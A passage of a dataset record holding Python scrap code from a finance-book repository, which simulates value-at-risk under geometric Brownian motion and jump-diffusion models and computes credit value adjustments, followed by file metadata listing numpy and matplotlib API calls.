* T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n R_gbm = np.sort(ST - S0)\n \n plt.hist(R_gbm, bins=50)\n plt.xlabel('absolute return')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'VaR0.png', dpi=300)\n plt.close()\n\n percs = [0.01, 0.1, 1., 2.5, 5.0, 10.0]\n var = scs.scoreatpercentile(R_gbm, percs)\n print(\"%16s %16s\" % ('Confidence Level', 'Value-at-Risk'))\n print(33 * \"-\")\n for pair in zip(percs, var):\n print(\"%16.2f %16.3f\" % (100 - pair[0], -pair[1]))\n\n dt = 30. 
/ 365 / M\n rj = lamb * (np.exp(mu + 0.5 * delta ** 2) - 1)\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn1 = npr.standard_normal((M + 1, I))\n sn2 = npr.standard_normal((M + 1, I))\n poi = npr.poisson(lamb * dt, (M + 1, I))\n for t in range(1, M + 1, 1):\n S[t] = S[t - 1] * (np.exp((r - rj - 0.5 * sigma ** 2) * dt\n + sigma * np.sqrt(dt) * sn1[t])\n + (np.exp(mu + delta * sn2[t]) - 1)\n * poi[t])\n S[t] = np.maximum(S[t], 0)\n R_jd = np.sort(S[-1] - S0)\n \n plt.hist(R_jd, bins=50)\n plt.xlabel('absolute return')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'VaR1.png', dpi=300)\n plt.close()\n \n percs = [0.01, 0.1, 1., 2.5, 5.0, 10.0]\n var = scs.scoreatpercentile(R_jd, percs)\n print(\"%16s %16s\" % ('Confidence Level', 'Value-at-Risk'))\n print(33 * \"-\")\n for pair in zip(percs, var):\n print(\"%16.2f %16.3f\" % (100 - pair[0], -pair[1]))\n\n percs = list(np.arange(0.0, 10.1, 0.1))\n gbm_var = scs.scoreatpercentile(R_gbm, percs)\n jd_var = scs.scoreatpercentile(R_jd, percs)\n\n plt.plot(percs, gbm_var, 'b', lw=1.5, label='GBM')\n plt.plot(percs, jd_var, 'r', lw=1.5, label='JD')\n plt.legend(loc=4)\n plt.xlabel('100 - confidence level [%]')\n plt.ylabel('value-at-risk')\n plt.grid(True)\n plt.ylim(ymax=0.0)\n plt.savefig(PATH + 'VaR2.png', dpi=300)\n plt.close()\n\ndef credit_adjustments():\n S0 = 100.\n r = 0.05\n sigma = 0.2\n T = 1.\n I = 100000\n ST = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n L = 0.5\n p = 0.01\n D = npr.poisson(p * T, I)\n D = np.where(D > 1, 1, D)\n print(np.exp(-r * T) * 1 / I * np.sum(ST))\n CVaR = np.exp(-r * T) * 1 / I * np.sum(L * D * ST)\n print(CVaR)\n S0_CVA = np.exp(-r * T) * 1 / I * np.sum((1 - L * D) * ST)\n print(S0_CVA)\n S0_adj = S0 - CVaR\n print(S0_adj)\n print(np.count_nonzero(L * D * ST))\n\n plt.hist(L * D * ST, bins=50)\n plt.xlabel('loss')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.ylim(ymax=175)\n plt.savefig(PATH + 'CVaR1.png', dpi=300)\n plt.close()\n\n K = 100.\n hT = np.maximum(ST - K, 0)\n C0 = np.exp(-r * T) * 1 / I * np.sum(hT)\n print(C0)\n CVaR = np.exp(-r * T) * 1 / I * np.sum(L * D * hT)\n print(CVaR)\n C0_CVA = np.exp(-r * T) * 1 / I * np.sum((1 - L * D) * hT)\n print(C0_CVA)\n print(np.count_nonzero(L * D * hT)) # number of losses\n print(np.count_nonzero(D)) # number of defaults\n print(I - np.count_nonzero(hT)) # zero payoff\n \n plt.hist(L * D * hT, bins=50)\n plt.xlabel('loss')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.ylim(ymax=350)\n plt.savefig(PATH + 'CVaR2.png', dpi=300)\n plt.close()\n\nif __name__ == '__main__':\n # randon_nums()\n # rand_vals()\n # stochastic_procs()\n # sqr_rt_diffusion()\n # stoch_vol()\n # jump_diffusion()\n # var_reduction()\n # valuation()\n # VaR()\n credit_adjustments()", "repo_name": "mccarvik/python_for_finance", "sub_path": "books/python_for_finance_book/ch_scraps/10ch_scrap.py", "file_name": "10ch_scrap.py", "file_ext": "py", "file_size_in_byte": 20606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": 
"sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.random.sample", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.random.chisquare", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "numpy.random.lognormal", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 86, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "scipy.stats.describe", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 104, "usage_type": "name"}, {"api_name": "scipy.stats.describe", "line_number": 105, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.random.lognormal", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 129, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.xlabel", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "utils.timeme", "line_number": 193, "usage_type": "call"}, {"api_name": "utils.timeme", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 214, "usage_type": "name"}, {"api_name": "numpy.maximum", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.random.noncentral_chisquare", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linalg.cholesky", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 248, "usage_type": "attribute"}, {"api_name": "numpy.random.standard_normal", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 252, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 260, "usage_type": "call"}, 
{"api_name": "numpy.sqrt", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 309, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 310, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 320, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 323, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 323, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 325, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 325, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 326, 
"usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 326, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 327, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 327, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 328, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 329, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 329, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 330, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 330, "usage_type": "name"}, {"api_name": "numpy.random.seed", "line_number": 336, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 336, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 337, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 337, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 341, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 343, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 347, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 347, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 348, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 348, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 349, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 351, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 377, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 377, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 378, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 380, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 380, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 401, "usage_type": "attribute"}, {"api_name": "bsm_functions.bsm_call_value", "line_number": 405, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 406, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 407, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 408, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 410, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 410, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 423, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 423, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 424, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 424, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 426, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 426, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 440, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 440, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 441, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 441, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 447, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 451, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 467, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 467, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 468, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 468, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 491, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 494, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 496, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 523, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 527, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 528, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 531, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 533, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 535, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 561, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 563, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 567, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 568, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 571, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 573, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 575, "usage_type": "call"}, {"api_name": "numpy.polyfit", "line_number": 577, "usage_type": "call"}, {"api_name": "numpy.polyval", "line_number": 578, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 579, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 581, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 594, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 595, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 595, "usage_type": "name"}, {"api_name": "numpy.sort", "line_number": 596, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 598, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 598, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 599, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 599, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 600, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 600, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 601, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 
601, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 602, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 602, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 603, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 603, "usage_type": "name"}, {"api_name": "scipy.stats.scoreatpercentile", "line_number": 606, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 606, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 613, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 614, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 616, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 616, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 617, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 617, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 618, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 620, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 621, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 622, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 624, "usage_type": "call"}, {"api_name": "numpy.sort", "line_number": 625, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 627, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 627, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 628, "usage_type": "call"}, {"api_name": 